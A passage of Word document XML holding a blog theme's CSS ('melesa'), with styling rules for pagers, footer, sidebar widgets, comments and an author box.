        <w:t>#main.grid-post article .ithumb, #main.grid-post article .img_nxt{width: 100%;height: 200px;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .ithumb{background-size: cover !important;background-position: center center !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*arrow pager*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow{text-align:center;margin:20px 20px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow #melesa-new{float: left;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow #melesa-old{float: right;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow a{border:1px solid #dcdcdc;padding: 10px 15px;color:#aaa}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow #melesa-new a{float: left;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow #melesa-old a{float: right;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow .melesa-home{display: table;margin: 0px auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-pager.arrow a:hover{background:$maincolor;border-color:$maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.blog-feeds{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Numbered Pager */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#melesa-pager{display:block;padding:5px 0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.showpage a, .pagenumber a, .current{position:relative;display:inline-block;padding:5px 11px;line-height:21px;margin:0 2px;background:#ffffff;color:#333;border:1px solid #dcdcdc;color:#aaa;font-size:12px;transition:all .3s;min-width:33px;text-align:center;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.showpage a:hover, .pagenumber a:hover, .current{background:$darkcolor;border-color:$darkcolor;color:#ffffff;text-decoration:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.current{color:#fff;background:$maincolor;border-color:$maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#melesa-pager .totalpages{float:right;padding:5px 11px;display:inline-block;font-size:12px;font-weight:500;color:#aaa;line-height:21px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*infinite Pager*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-loadmore{text-align: center}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-loadmore a{color: #aaa;border:1px solid #dcdcdc;padding: 10px 15px;box-sizing: border-box}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-loadmore a:hover{  color: #fff;border-color: $maincolor;background: $maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-loadmore a.disable:hover{background: transparent;border-color: #dcdcdc;color:#aaa;cursor:initial}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Footer*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper{background: $fbgcolor; color: $ftxtcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper a{color: $ftxtcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper .widget &gt; h2{border-bottom: 0;font-size: 18px;font-weight: 700;margin-bottom: 30px;margin-top: 2px;text-transform: uppercase;border-bottom:2px solid rgba(255,255,255,0.3);padding-bottom:10px;margin-bottom: 10px;position:relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper .widget .widget-content{font-size:13px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper a:hover{color: $maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper .widget &gt; h2:after{content: "";position: absolute;left: 0px;bottom: -2px;background: $maincolor;width: 80%;display: table;height: 2px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-4 .columns-cell{width: 25%;float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-3 .columns-cell{width: 33.33%;float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-2 .columns-cell{width: 50%;float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-cols-1 .columns-cell{width: 100%;float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Sidebar */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#right-sidebar-area .widget &gt; h2,#left-sidebar-area .widget &gt; h2{font-size: 14px;font-weight: 700;margin-bottom: 30px;margin-top: 10px;text-transform: uppercase;border-bottom: 1px solid #c3c3c9;padding-bottom: 10px;margin-bottom: 10px;position: relative;color: #c3c3c9;font-family: 'Montserrat', sans-serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Featured Post Widget*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost.widget{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost img{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.FeaturedPost .post-summary{background-size: cover;box-sizing: border-box;padding:20px 30px;background-position: center center; position:relative;background-color:#151515}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost .post-summary h3{padding-top:80%;z-index:2;position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost .post-summary p{z-index:2;position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost .post-summary a,.FeaturedPost .post-summary {color:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost a:hover{color:#ccc}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost .overlay{position: absolute;left: 0px;top:0px;height: 100%;width: 100%;background: rgba(0,0,0,0.2);z-index: 1;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost:hover .overlay{position: absolute;left: 0px;top:0px;height: 100%;width: 100%;background: rgba(0,0,0,0.5);z-index: 1;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FeaturedPost h2.title{margin-bottom: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Subscribe Widget */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail h2.title{margin-bottom:0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail td{clear: left;display: block;width: 100% !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail form{margin: 0px !important;box-sizing: border-box;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table td:nth-child(1):before{content: "Enter your email address below to subscribe to our newsletter";box-sizing: border-box;font-weight: 300;color:#aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table,.FollowByEmail form{box-sizing: border-box;padding: 10px 0px!important;margin-bottom: 0px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table td:nth-child(1) input:nth-child(1){margin-top:10px;margin-bottom: 0px;width: 100% !important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table td:nth-child(2) input:nth-child(1){margin-top:0px;margin-bottom: 0px;width: 100% !important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table td:nth-child(2) input:nth-child(1):hover{background: #fff;color: #000}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table .follow-by-email-address{height:40px !important;padding:10px 20px;line-height: 30px;font-size:15px !important;font-family:'Roboto', sans-serif;font-weight:400;border:1px solid #ccc !important;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table .follow-by-email-submit{margin: 0px !important;padding: 0px !important;border-radius: 0px !important;margin-top:10px !important;background: $maincolor !important;font-family:'Roboto', sans-serif !important;font-weight:500 !important;;height: 40px !important;font-size:15px !important; text-transform: uppercase;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.FollowByEmail table .follow-by-email-submit:hover{color:#fff !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/* Popular Posts */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul{list-style-type: none;padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul li .item-thumbnail{position: relative;overflow: hidden;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul li.item-thumbnail img{transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul li:hover .item-thumbnail img{transform: scale(1.1,1.1);transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul li .item-snippet{font-size: 12px;color: #777;font-family: 'Open Sans',arial,sans-serif;margin-top: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.PopularPosts ul li .item-title a{font-weight: 500;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Labels */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.Label ul{list-style-type: none;padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.Label li{float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.Label li a{padding: 5px 8px;border: 1px solid #ccc;display: table;margin:0px 3px;font-size:13px;color:#aaa;line-height: 18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.fwrapper .Label li a{padding: 5px 8px !important;display: block !important;color: $ftxtcolor;border-color:$ftxtcolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.Label li a:hover{color: $ftxtcolor;background: $maincolor;border-color: $maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Bcrumbs */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.breadcrumbs,.breadcrumbs a{font-family: 'Open Sans',arial,sans-serif;font-size: 12px;color: #c3c3c3;line-height: 18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.breadcrumbs i{font-size:9px;padding:0px 5px;display: inline-block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.breadcrumbs{padding-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-post-title{font-weight: 500;margin-top: 0;margin-bottom: 0px;word-wrap: break-word;font-size: 41px;line-height: 50px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-meta{color: #aaa;display: inline-block;position: relative;top: 2px;font-family: 'Open Sans',arial,sans-serif;font-size: 11px;line-height: 1;min-height: 17px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Post Footer */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-left-tags{float: left};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share{float: right;text-align: right;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-footer{padding:10px 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share ul li{float: right;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-right-share ul li a {display: inline-block;color: #FFF;text-align: center;font-size: 12px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share .share-links .social-item {padding: 4px 10px;box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1);cursor: pointer;margin-left: 5px;text-align: center;-webkit-transition: 0.2s;-o-transition: 0.2s;transition: 0.2s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share .share-links .social-item.facebook {background: #3b5998;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share .share-links .social-item.twitter {background: #00aced;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-right-share .share-links .social-item.google {background: #dd4b39;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-left-tags{font-weight: 500;font-family: 'Open Sans', sans-serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-left-tags a{text-decoration: underline;font-style: italic;font-weight: 100;font-family: 'Open Sans', sans-serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* COMMENTS */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#comments .comment .comment-block{border:0px;padding-bottom:15px;position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comments-content .comment-content{font-size: 14px;background: #f5f5f5 none repeat scroll 0 0;color: #4b4b55;line-height: 24px;width: 100%;  display: border-box;  padding: 20px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comment-actions{position: absolute;width: auto;right: 0px;top:-10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comment-actions a{background: #fff !important;color:#aaa !important;border: 1px solid #eaeaf1 !important;transition: 0s all ease-in-out !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comment-actions a:hover{background: $maincolor !important;color: #fff !important;border-color: $maincolor !important;transition: 0s all ease-in-out !important;text-decoration:none !important}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comments-content .comment-header{border-bottom: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments h4{border-bottom: 1px solid #f7f7f7;text-align: left;color: #2f2f33;font-weight: 500;font-size: 18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments h4:after{display: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .comment-actions a{margin:5px;display: inline-block;font-size:12px;padding:4px 8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .user a{font-weight: 500;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .datetime a{color: #c3c3c3;font-size:11px;clear: left;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .icon.user.blog-author:before{content:"\f3fe";font-family: "Ionicons";color:$maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .continue a{width: 100% !important;text-align: center;border:1px solid #ccc;color:#aaa;font-weight: 300;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments .continue a:hover{color:#fff;border-color:$maincolor;background: $maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.comments h4{border-bottom: 0;font-size: 18px;font-weight: 700;margin-bottom: 30px;margin-top: 2px;text-transform: uppercase;border-bottom: 2px solid #ecede7;padding-bottom: 10px;margin-bottom: 10px;position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.comments h4:after{content: "";position: absolute;left: 0px;bottom: -2px;background: $maincolor;width: 80%;display: table;height: 2px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>h4#comment-post-message{text-align:center;border:1px solid #ccc;padding:18px 0px;box-sizing:border-box;color:#aaa;font-size:16px;display:table;width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>h4#comment-post-message:after{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* melesa Author */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author{box-sizing: border-box;padding: 10px 10px;border:1px solid #f7f7f7;margin:20px 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .box-author .post-author{display: table;width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .author-img{padding-right: 20px;display: table;float: left}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .author-content{padding-left: 130px;vertical-align: top;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.top-author a{font-size:16px;line-height: 18px;font-weight: 600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#melesa-author-post-desc-place{color: $darkcolor;font-size:12px;letter-spacing: 0.5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author #mlsa-link-place ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author #mlsa-link-place ul li{float: left;padding: 0px 8px;list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-facebook{color:#3b5999}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-twitter{color: #55acee}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-linkedin{color:#0077B5}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-skype{color: #00AFF0}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-dropbox{color: #007ee5}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-wordpress{color: #21759b}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-vimeo, .melesa-author .fa-vimeo-square{color: #1ab7ea}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-slideshare{color: #0077b5}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-vk{color:#4c75a3}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-tumblr, .melesa-author .fa-tumblr-square{color: #34465d}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-yahoo{color: #410093}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-author .fa-google-plus,.melesa-author .fa-google-plus-square,.melesa-author .fa-google-plus-official{color: #dd4b39}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-author .fa-pinterest-p,.melesa-author .fa-pinterest-square, .melesa-author .fa-pinterest{color: #bd081c}</w:t>
      </w:r>
    </w:p>
